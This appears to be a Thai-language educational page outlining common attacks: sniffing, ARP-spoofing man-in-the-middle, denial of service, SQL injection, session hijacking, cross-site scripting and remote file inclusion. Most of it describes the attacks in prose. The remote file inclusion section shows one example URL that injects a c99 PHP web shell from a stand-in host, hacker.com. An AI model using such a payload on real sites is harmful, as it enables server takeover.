hack3

การสอดแนมและการดักฟัง/ดักจับข้อมูล (Sniffing)

    ข้อมูลที่ส่งไปมาบนระบบเครือข่ายสามารถถูกดักจับได้โดยใช้โปรแกรม เช่น Sniffer, Wireshark แม้แต่บนเครือข่ายที่ใช้ Switch ก็ตาม ผู้ดักจับข้อมูลจะใช้เทคนิค ARP Spoof เพื่อหลอกเหยื่อว่าเครื่องตนเองเป็นเกตเวย์และหลอกเกตเวย์ ว่าเครื่องของตนเป็นเครื่องของเหยื่อ จากนั้นก็จะสามารถดักจับข้อมูลที่เหยื่อรับส่งกับอินเทอร์เน็ตได้ การดักจับข้อมูลมีจุดประสงค์เพื่อให้ได้มาซึ่งข้อมูลสำคัญ เช่น รหัสผ่าน Cookie/Session ID รวมทั้งข้อความที่สือสารกัน เป็นต้น

รูปที่ 1 การดักจับข้อมูลของ Hacker

การโจมตีแบบแทรกกลางการสื่อสาร (Man in the Middle Attack: MITM)

      การใช้เทคนิค ARP Spoof เพื่อหลอกเหยื่อว่าเครื่องของตนเป็นเกตเวย์ และหลอกเกตเวย์ว่าเครื่องของตนเป็นเครื่องของเหยื่อเรียกว่า MITM ซึ่งสามารถต่อยอดเทคนิคนี้เพื่อทำการปลอม Certificate เพื่อใช้ในการถอดรหัส https ได้ ดังนั้นหากถูกโจมตีด้วยเทคนิค MITM แล้วเหยื่ออาจจะสูญเสียข้อมูลสำคัญรวมทั้งรหัสผ่านได้ แม้การสื่อสารนั้นจะอยู่ https ซึ่งถือว่าอยู่บนความปลอดภัยแล้วก็ตาม

การโจมตีแบบ Denial of Service: DoS

      การโจมตีลักษณะนี้มีเป้าหมายเพื่อให้เครื่องแม่ข่ายหยุดให้บริการหรือไม่สามารถให้บริการได้หรือให้บริการได้ด้วยประสิทธิภาพที่ต่ำ การโจมตีนี้มักจะเป็นทางเลือกสุดท้ายของผู้โจมตี เพราะผู้โจมตีต้องการเข้าถึงระบบเป้าหมายด้วยสิทธิสูงสุด หรืออย่างน้อยก็เพื่อให้สามารถเปลี่ยนแปลงข้อมูลบางส่วนได้ แต่ถ้าหากผู้โจมตีทำอะไรเป้าหมายไม่ให้ ก็มักจะโจมตีด้วยการส่งแพ็กเก็ตจำนวนมหาศาล(หรือวิธีการอื่นๆ) เพื่อให้เป้าหมายทำงานช้าลหรือหยุดการทำงาน

  รูปที่ 2 การโจมตีแบบ DoS

การโจมตี Web Application

      การโจมตี Wep Application เป็นที่นิยมมากเนื่องจากแฮกเกอร์สามารถโจมตีได้จากทุกมุมโลกและใช้ Port ที่ Firewall เปิด (Port 80) การโจมตีนี้ แบ่งออกได้หลายประเภท ดังนี้

• • SQL Injection เป็นการาส่งตัวอักษรที่เป็นส่วนหนึ่งของคำสั่ง SQL ไปยัง Server โดยใช้ช่องทางการป้อน Input เช่น ช่อง Log in, Search ยิ่งไปกว่านั้นหากแฮกเกอร์ที่มีความชำนาญสามารถส่ง SQL Injection แทนค่าในตัวแปรแบบ Option, Drop down List หรือแม้แต่ Cookie ได้ การโจมตีแบบนี้สามารถทำให้แฮกเกอร์ที่มีความชำนาญใช้ช่องโหว่นี้เปิดดูรหัสผ่านของทุกคนใน Database ได้ ดังวีดีโอต่อไปนี้

• • Session Hijacking  เป็นการโจมตีที่ทำให้แฮกเกอร์สามารถขโมย Session ของเหยื่อได้ โดยจะทำให้แฮกเกอร์เข้าสู่ระบบได้ด้วยสิทธิ์ของเหยื่อ การโจมตีแบบนี้ ในสมัยก่อนจะเป็นการขโมย Session ของ TCP (เช่น กรณีที่แฮกเกอร์ชื่อดังที่สุดในโลก Kevin Mitnik ขโมย TCP Session แล้วเข้าไปควบคุมเครื่องคอมพิวเตอร์แม่ข่ายของหน่วยงานทางด้านความปลอดภัยของสหรัฐอเมริกาในปี 1995) แต่ปัจจุบัน Session Hijacking ถูกนำมาใช้กับ Session ของ Web Application แทน ซึ่งหากแฮกเกอร์สามารถเข้าขโมย HTTP Session ของผู้ดูแลเว็บไซต์ได้เขาก็สามารถเข้าไปควบคุมเว็บไซต์แห่งนั้นได้

วีดีโอการทำ Session Hijacking ด้วย BT 5

• • Cross Site Scripting: XSS เป็นการโจมตีโดยใช้ Script เช่น Java Script โดยแฮกเกอร์จะทำการแทรก Script เข้าไปในระบบหรือส่ง Script นั้นมาให้เหยื่อโดยตรงผ่านทางลิงค์ Script ซึ่งทำงานบนบราวเซอร์ของเหยื่อ การทำงานจะขึ้นอยู่กับว่าแฮกเกอร์จะเขียน Script ให้ทำสิ่งใดบ้าง แต่โดยส่วนมากแล้วมักจะใช้เพื่อการขโมย Session ID เพื่อเข้าสู่ระบบ

วีดีโอการทำ XSS

• • Remote File Inclusion เป็นการโจมตีไฟล์ .php หรือ .asp ที่มีการเขียนเรียกรวมไฟล์ย่อยเข้ากับไฟล์หลัก หรือเรียกรวมไฟล์ที่ทำงานเป็น Header หรือ Library ต่าง ๆ โดยเว็บไซต์ที่มีช่องโหว่นี้มักจะมีลิงค์ที่มีช่องโหว่ เช่น

    • http://www.panda.co.th/show.php?page=main.html

    • หากแฮกเกอร์โจมตีจะเปลี่ยนพารามิเตอร์ให้กลายเป็น

  • http://www.panda.co.th/show.php?page=http://hacker.com/c99.php

  • เขาก็สามารถที่จะรัน php shell บนเว็บเซฟเวอร์ของเหยื่อได้ ซึ่งเป็นช่องทางที่แฮกเกอร์จะเข้าถึงไฟล์ต่าง ๆ และรันคำสั่ง Linux/windows Command บนเว็บเซฟเวอร์ของเหยื่อได้

    •